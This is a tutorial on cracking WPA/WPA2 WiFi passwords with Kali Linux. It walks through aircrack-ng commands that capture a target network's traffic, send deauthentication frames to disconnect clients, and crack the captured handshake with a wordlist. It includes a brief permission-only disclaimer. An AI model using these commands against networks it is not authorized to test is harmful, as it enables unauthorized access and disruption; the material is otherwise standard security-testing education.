How to Hack WPA/WPA2 WiFi Using Kali Linux?

“Hacking Wifi” sounds really cool and interesting. But actually hacking wifi practically is much easier with a good wordlist. But this world list is of no use until we don’t have any idea of how to actually use that word list in order to crack a hash. And before cracking the hash we actually need to generate it. So, below are those steps along with some good wordlists to crack a WPA/WPA2 wifi.

Note: Use the below methods only for educational/testing purposes on your own wifi or with the permission of the owner. Don’t use this for malicious purposes.

So, boot up Kali Linux. Open the terminal window. And perform the following steps.

Step 1: ifconfig(interface configuration) : To view or change the configuration of the network interfaces on your system.

ifconfig

ifconfig-linux-interface-configuration



Here,

  • eth0 : First Ethernet interface
  • l0 : Loopback interface
  • wlan0 : First wireless network interface on the system. (This is what we need.)

Step 2: Stop the current processes which are using the WiFi interface.

airmon-ng check kill

stop-process-which-are-using-wifi-linux

Step 3: To start the wlan0 in monitor mode.

airmon-ng start wlan0

start-interface-linux

Step 4: To view all the Wifi networks around you.

airodump-ng wlan0mon

view-all-wifi-networks

Here,



  • airodump-ng : For packet capturing
  • wlan0mon : Name of the interface (This name can be different on the different devices)

Press Ctrl+C to stop the process when you have found the target network.

Step 5: To view the clients connected to the target network.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

view-connected-clients-to-target

Here,

  • airodump-ng : For packet capturing
  • -c : Channel
  • –bssid : MAC address of a wireless access point(WAP).
  • -w : The Directory where you want to save the file(Password File).
  • wlan0mon : Name of the interface.

Step 6: Open a new terminal window to disconnect the clients connected to the target network.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

disconnect-clients-connected-to-target

  • aireplay-ng : To inject frames
  • -0 : For deauthentication
  • 10 : No. of deauthentication packets to be sent
  • -a : For the bssid of the target network
  • wlan0mon : Name of the interface.

When the client is disconnected from the target network. He tries to reconnect to the network and when he does you will get something called WPA handshake in the previous window of the terminal.

capturing-WPA-handshake

Now, we are done with capturing the packets. So, now you can close the terminal window.

Step 7. To decrypt the password. Open the Files application.

to-decrypt-password-from-handshake

Here,

  • hacking-01.cap is the file you need.
    aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program
  • -a : -a2 for WPA2 & -a for WPA network
  • -b : The BSSID of the target network
  • -w : Location of the wordlist file
  • /root/hacking-01.cap : Location of the cap file

You can download the file of common passwords from the internet and if you want to create your own file then you can use the crunch tool
wifi-password-cracked

My Personal Notes arrow_drop_up

Check out this Author's contributed articles.

If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks main page and help other Geeks.

Please Improve this article if you find anything incorrect by clicking on the "Improve Article" button below.


Article Tags :

Be the First to upvote.


Please write to us at contribute@geeksforgeeks.org to report any issue with the above content.